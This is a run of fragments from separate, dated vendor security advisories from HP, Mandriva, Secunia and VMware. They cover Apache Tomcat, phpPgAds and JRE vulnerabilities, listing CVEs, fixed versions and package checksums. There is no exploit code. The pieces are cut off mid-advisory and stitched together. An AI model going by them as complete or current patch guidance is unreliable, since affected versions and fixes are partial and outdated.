HP-UX B.11.23
HP-UX B.11.31
=============
hpuxwsAPACHE,revision=B.1.0.00.01
hpuxwsAPACHE,revision=B.1.0.07.01
hpuxwsAPACHE,revision=B.1.0.08.01
hpuxwsAPACHE,revision=B.1.0.09.01
hpuxwsAPACHE,revision=B.1.0.10.01
hpuxwsAPACHE,revision=B.2.0.48.00
hpuxwsAPACHE,revision=B.2.0.49.00
hpuxwsAPACHE,revision=B.2.0.50.00
hpuxwsAPACHE,revision=B.2.0.51.00
hpuxwsAPACHE,revision=B.2.0.52.00
hpuxwsAPACHE,revision=B.2.0.53.00
hpuxwsAPACHE,revision=B.2.0.54.00
hpuxwsAPACHE,revision=B.2.0.55.00
hpuxwsAPACHE,revision=B.2.0.56.00
hpuxwsAPACHE,revision=B.2.0.58.00
hpuxwsAPACHE,revision=B.2.0.58.01
action: install revision B.2.0.59.00 or subsequent
restart Apache
URL: https://www.hp.com/go/softwaredepot/
END AFFECTED VERSIONS
RESOLUTION
HP has made the following available to resolve the vulnerability.
HP-UX Apache-based Web Server v.2.18 powered by Apache Tomcat Webmin or subsequent.
The update is available on https://www.hp.com/go/softwaredepot/
Note: HP-UX Apache-based Web Server v.2.18 powered by Apache Tomcat Webmin contains HP-UX Apache-based Web Server v.2.0.59.00.
MANUAL ACTIONS: Yes - Update
Install HP-UX Apache-based Web Server v.2.18 powered by Apache Tomcat Webmin or subsequent.
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant:
HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically.
For more information see: https://www.hp.com/go/swa
HISTORY
Revision: 1 (rev.1) - 02 October 2007 Initial release
Third Party Security Patches:
Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
- check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
- verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
\xa9Copyright 2007 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1
iQA/AwUBRwVCruAfOvwtKn1ZEQK1YgCfavU7x1Hs59uLdP26lpZFwMxKofIAn3gJ
HHoe3AY1sc6hrW3Xk+B1hcbr
=+E1W
-----END PGP SIGNATURE-----
.
Multiple cross-site scripting vulnerabilities in the Manager and Host
Manager web applications allow remote authenticated users to inject
arbitrary web script or HTML (CVE-2007-2450).
Tomcat treated single quotes as delimiters in cookies, which could
cause sensitive information such as session IDs to be leaked and allow
remote attackers to conduct session hijacking attacks (CVE-2007-3382).
Tomcat did not properly handle the " character sequence in a cookie
value, which could cause sensitive information such as session IDs
to be leaked and allow remote attackers to conduct session hijacking
attacks (CVE-2007-3385).
A cross-site scripting vulnerability in the Host Manager servlet
allowed remote attackers to inject arbitrary HTML and web script via
crafted attacks (CVE-2007-3386).
The updated packages have been patched to correct these issues.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0450
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2449
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2450
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3382
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3385
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3386
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5461
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2007.1:
2eaba952d2699868ef76ca11dc7743e2 2007.1/i586/tomcat5-5.5.17-6.2.4.1mdv2007.1.i586.rpm
037b18dda99d06be0b77f35964257902 2007.1/i586/tomcat5-admin-webapps-5.5.17-6.2.4.1mdv2007.1.i586.rpm
d9e6c355370c0e3f9aebc7ba0edd99d5 2007.1/i586/tomcat5-common-lib-5.5.17-6.2.4.1mdv2007.1.i586.rpm
fcb4fa36ea0926a0fbd92d1f9c9d9671 2007.1/i586/tomcat5-jasper-5.5.17-6.2.4.1mdv2007.1.i586.rpm
fedd1a27a4f46d0d793c3ceb21a57246 2007.1/i586/tomcat5-jasper-javadoc-5.5.17-6.2.4.1mdv2007.1.i586.rpm
ab5985c840c14c812b3e72dae54407f0 2007.1/i586/tomcat5-jsp-2.0-api-5.5.17-6.2.4.1mdv2007.1.i586.rpm
6266395d78af5f64ce7a150b9175fab7 2007.1/i586/tomcat5-jsp-2.0-api-javadoc-5.5.17-6.2.4.1mdv2007.1.i586.rpm
08335caaa65e97003aa67d465ce60ae1 2007.1/i586/tomcat5-server-lib-5.5.17-6.2.4.1mdv2007.1.i586.rpm
3a4f5995900419c7354804ae0dc548b6 2007.1/i586/tomcat5-servlet-2.4-api-5.5.17-6.2.4.1mdv2007.1.i586.rpm
0c27ba521cee0d06627f121df3a138c9 2007.1/i586/tomcat5-servlet-2.4-api-javadoc-5.5.17-6.2.4.1mdv2007.1.i586.rpm
07537a59d8549f412dc4c9a783f41177 2007.1/i586/tomcat5-webapps-5.5.17-6.2.4.1mdv2007.1.i586.rpm
b55342a597ab506be934b6a73ed24005 2007.1/SRPMS/tomcat5-5.5.17-6.2.4.1mdv2007.1.src.rpm
Mandriva Linux 2007.1/X86_64:
aea539336fa58a995ae1411fe61934c2 2007.1/x86_64/tomcat5-5.5.17-6.2.4.1mdv2007.1.x86_64.rpm
0225750a0d4ef032915783d0b29c1504 2007.1/x86_64/tomcat5-admin-webapps-5.5.17-6.2.4.1mdv2007.1.x86_64.rpm
8223d038509a71f537f537909e9ef863 2007.1/x86_64/tomcat5-common-lib-5.5.17-6.2.4.1mdv2007.1.x86_64.rpm
dedd59d873c5bb4e608b1328595f2d98 2007.1/x86_64/tomcat5-jasper-5.5.17-6.2.4.1mdv2007.1.x86_64.rpm
c0ef0eda05488b8b571e6700a9365ea3 2007.1/x86_64/tomcat5-jasper-javadoc-5.5.17-6.2.4.1mdv2007.1.x86_64.rpm
95dae961b82630d633fc3419383dbe4b 2007.1/x86_64/tomcat5-jsp-2.0-api-5.5.17-6.2.4.1mdv2007.1.x86_64.rpm
41378a0106da001d545681c185b2f5c3 2007.1/x86_64/tomcat5-jsp-2.0-api-javadoc-5.5.17-6.2.4.1mdv2007.1.x86_64.rpm
5448b57b7667414c12aabb1da5e528fa 2007.1/x86_64/tomcat5-server-lib-5.5.17-6.2.4.1mdv2007.1.x86_64.rpm
9a277ae64587b81f61e8c118ba4d4571 2007.1/x86_64/tomcat5-servlet-2.4-api-5.5.17-6.2.4.1mdv2007.1.x86_64.rpm
1be4b0eea59741ef7efb0f51f97e19c7 2007.1/x86_64/tomcat5-servlet-2.4-api-javadoc-5.5.17-6.2.4.1mdv2007.1.x86_64.rpm
d3965a643dbdc8e685ff4b5861877254 2007.1/x86_64/tomcat5-webapps-5.5.17-6.2.4.1mdv2007.1.x86_64.rpm
b55342a597ab506be934b6a73ed24005 2007.1/SRPMS/tomcat5-5.5.17-6.2.4.1mdv2007.1.src.rpm
Mandriva Linux 2008.0:
828e35db12f9dab3a5e63c475c289f88 2008.0/i586/tomcat5-5.5.23-9.2.10.1mdv2008.0.i586.rpm
5e98b01f16f8213db5e842dcb47e4e8b 2008.0/i586/tomcat5-admin-webapps-5.5.23-9.2.10.1mdv2008.0.i586.rpm
fd483503d3f313775be4c098858a4e0d 2008.0/i586/tomcat5-common-lib-5.5.23-9.2.10.1mdv2008.0.i586.rpm
23dffdf05e1c50d5cfea045552c8f3bb 2008.0/i586/tomcat5-jasper-5.5.23-9.2.10.1mdv2008.0.i586.rpm
3da9fcc0e4c0c8366b676e0770b8fe7c 2008.0/i586/tomcat5-jasper-javadoc-5.5.23-9.2.10.1mdv2008.0.i586.rpm
03222fbcf7fad63aa6920d5d4ee55ee2 2008.0/i586/tomcat5-jsp-2.0-api-5.5.23-9.2.10.1mdv2008.0.i586.rpm
566362e78e6dd5f853b616204453aa0d 2008.0/i586/tomcat5-jsp-2.0-api-javadoc-5.5.23-9.2.10.1mdv2008.0.i586.rpm
fd00fd2a4faa567523ba9ce959ad1efa 2008.0/i586/tomcat5-server-lib-5.5.23-9.2.10.1mdv2008.0.i586.rpm
8a8c1b69636876ac31b0968edce82d3f 2008.0/i586/tomcat5-servlet-2.4-api-5.5.23-9.2.10.1mdv2008.0.i586.rpm
85d0641840725e728f18cc86925d1923 2008.0/i586/tomcat5-servlet-2.4-api-javadoc-5.5.23-9.2.10.1mdv2008.0.i586.rpm
3e62b31a3fce47b8d7e2de2ecc7eb29d 2008.0/i586/tomcat5-webapps-5.5.23-9.2.10.1mdv2008.0.i586.rpm
9522ebba28176adf03d9a7b33fb526f8 2008.0/SRPMS/tomcat5-5.5.23-9.2.10.1mdv2008.0.src.rpm
Mandriva Linux 2008.0/X86_64:
a44ed55a6a2943e5ba39ea6473a2af27 2008.0/x86_64/tomcat5-5.5.23-9.2.10.1mdv2008.0.x86_64.rpm
292e2c0a822a736fe85c498c17bb09c6 2008.0/x86_64/tomcat5-admin-webapps-5.5.23-9.2.10.1mdv2008.0.x86_64.rpm
c8ee3862233f323278d0b97a3f07a74d 2008.0/x86_64/tomcat5-common-lib-5.5.23-9.2.10.1mdv2008.0.x86_64.rpm
0c944fe5d8725da8fd4e57e89539fa21 2008.0/x86_64/tomcat5-jasper-5.5.23-9.2.10.1mdv2008.0.x86_64.rpm
bcbb50b5978295bd40ec24212ca77a8a 2008.0/x86_64/tomcat5-jasper-javadoc-5.5.23-9.2.10.1mdv2008.0.x86_64.rpm
472c0a30c7ad74c0cb63da51142de438 2008.0/x86_64/tomcat5-jsp-2.0-api-5.5.23-9.2.10.1mdv2008.0.x86_64.rpm
10c6da9615553dc07e2f59d226f30a1d 2008.0/x86_64/tomcat5-jsp-2.0-api-javadoc-5.5.23-9.2.10.1mdv2008.0.x86_64.rpm
53eba8a64c428e6e2a14e59095f958b4 2008.0/x86_64/tomcat5-server-lib-5.5.23-9.2.10.1mdv2008.0.x86_64.rpm
8c6849bcca11457dffd03aa9c9e9a35f 2008.0/x86_64/tomcat5-servlet-2.4-api-5.5.23-9.2.10.1mdv2008.0.x86_64.rpm
b5b42989963c31f79a997c9c18ed4cb4 2008.0/x86_64/tomcat5-servlet-2.4-api-javadoc-5.5.23-9.2.10.1mdv2008.0.x86_64.rpm
667a7b6fe2d3bc22ef64d87c2a6b9fe7 2008.0/x86_64/tomcat5-webapps-5.5.23-9.2.10.1mdv2008.0.x86_64.rpm
9522ebba28176adf03d9a7b33fb526f8 2008.0/SRPMS/tomcat5-5.5.23-9.2.10.1mdv2008.0.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
iD8DBQFHXZ68mqjQ0CJFipgRAhO2AKC+AwaCU8LmMtlbmj5Q9HgrOr3PTwCeMZo1
QKCxPSeNSXZPdPEE6c2TDyk=
=z6UT
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
.
----------------------------------------------------------------------
Bist Du interessiert an einem neuen Job in IT-Sicherheit?
Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT-
Sicherheit:
http://secunia.com/secunia_vacancies/
----------------------------------------------------------------------
TITLE:
phpPgAds XML-RPC PHP Code Execution Vulnerability
SECUNIA ADVISORY ID:
SA15884
VERIFY ADVISORY:
http://secunia.com/advisories/15884/
CRITICAL:
Highly critical
IMPACT:
System access
WHERE:
>From remote
SOFTWARE:
phpPgAds 2.x
http://secunia.com/product/4577/
DESCRIPTION:
A vulnerability has been reported in phpPgAds, which can be exploited
by malicious people to compromise a vulnerable system.
For more information:
SA15852
SOLUTION:
Update to version 2.0.5.
http://sourceforge.net/project/showfiles.php?group_id=36679
OTHER REFERENCES:
SA15852:
http://secunia.com/advisories/15852/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Summary:
Updated Tomcat and Java JRE packages for VirtualCenter 2.0.2, ESX
Server 3.0.2, and ESX 3.0.1. Relevant releases:
VirtualCenter Management Server 2
ESX Server 3.0.2 without patch ESX-1002434
ESX Server 3.0.1 without patch ESX-1003176
3.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2005-2090, CVE-2006-7195, and CVE-2007-0450 to
these issues.
JRE Security Update
This release of VirtualCenter Server updates the JRE package from
1.5.0_7 to 1.5.0_12, which addresses a security issue that existed in
the earlier release of JRE.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2007-3004 to this issue.
Security best practices provided by VMware recommend that the
service console be isolated from the VM network. Please see
http://www.vmware.com/resources/techresources/726 for more
information on VMware security best practices. Solution:
Please review the Patch notes for your product and version and verify
the md5sum of your downloaded file.
VMware VirtualCenter 2.0.2 Update 2 Release Notes
http://www.vmware.com/support/vi3/doc/releasenotes_vc202u2.html
VirtualCenter CD image
md5sum d7d98a5d7f8afff32cee848f860d3ba7
VirtualCenter as Zip
md5sum 3b42ec350121659e10352ca2d76e212b
ESX Server 3.0.2
http://kb.vmware.com/kb/1002434
md5sum: 2f52251f6ace3d50934344ef313539d5
ESX Server 3.0.1
http://kb.vmware.com/kb/1003176
md5sum: 5674ca0dcfac90726014cc316444996e
5. Contact:
E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
* security-announce@lists.vmware.com
* bugtraq@securityfocus.com
* full-disclosure@lists.grok.org.uk
E-mail: security@vmware.com
Security web site
http://www.vmware.com/security
VMware security response policy
http://www.vmware.com/support/policies/security_response.html
General support life cycle policy
http://www.vmware.com/support/policies/eos.html
VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html
Copyright 2008 VMware Inc